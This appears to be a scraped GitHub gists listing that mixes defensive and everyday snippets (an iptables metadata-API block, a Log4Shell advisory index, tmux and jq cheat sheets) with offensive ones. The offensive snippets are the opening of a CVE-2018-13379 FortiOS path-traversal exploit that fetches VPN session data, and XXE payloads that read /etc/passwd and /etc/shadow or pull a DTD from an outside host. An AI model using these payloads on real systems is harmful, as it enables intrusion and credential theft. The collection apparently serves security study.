Rafael ChOkO ChOkO08

@miguelmota
miguelmota / iptables.sh
Created January 7, 2022 02:39
Linux iptables block Docker container from accessing AWS metadata API (169.254.169.254)
sudo iptables --insert DOCKER-USER --destination 169.254.169.254 --jump REJECT
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active April 26, 2024 07:30
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
@code-machina
code-machina / CVE-2018-13379.py
Last active May 29, 2023 03:33
CVE-2018-13379 : A path traversal vulnerability in the FortiOS SSL VPN web portal
import requests, binascii, optparse
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
import multiprocessing
def checkIP(ip):
    try:
        url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
@worldofprasanna
worldofprasanna / terminal-capture.md
Last active April 30, 2024 20:54
Multiple screen terminal capture using asciinema & tmux

Commands Reference

  1. Start a new tmux named session: tmux new -s terminal-capture
  2. Split the screen using these commands,
     • vertical split <C-b>"
     • horizontal split <C-b>%
  3. To navigate between the panes,
     • To go to Left pane <C-b> left-key
     • To go to Right pane <C-b> right-key
     • To go to Top pane up-key
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<data>&file;</data>
<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]>
xxe.dtd:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@jh00nbr
jh00nbr / solver_we_also_have_memes.py
Last active February 1, 2024 04:21
Writeup - Challenge - We also have memes! - 3DS-CTF
from PIL import Image
import sys
# Team RTFM - Red Team Freakin' Maniacs - rtfm-ctf.org
# Writeup - We also have memes!- 3DS-CTF
# Playing other CTFs, our team discovered an awesome algorithm to hide messages in a PNG file.
# One member of the team said that it is possible to improve the algorithm to make it impossible to retrieve the original message directly. So he hid a message in this meme and gave it to us to solve.
# Prove that he's wrong!
@olih
olih / jq-cheetsheet.md
Last active May 2, 2024 00:42
jq Cheat Sheet

Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.

Installing jq

On Mac OS

brew install jq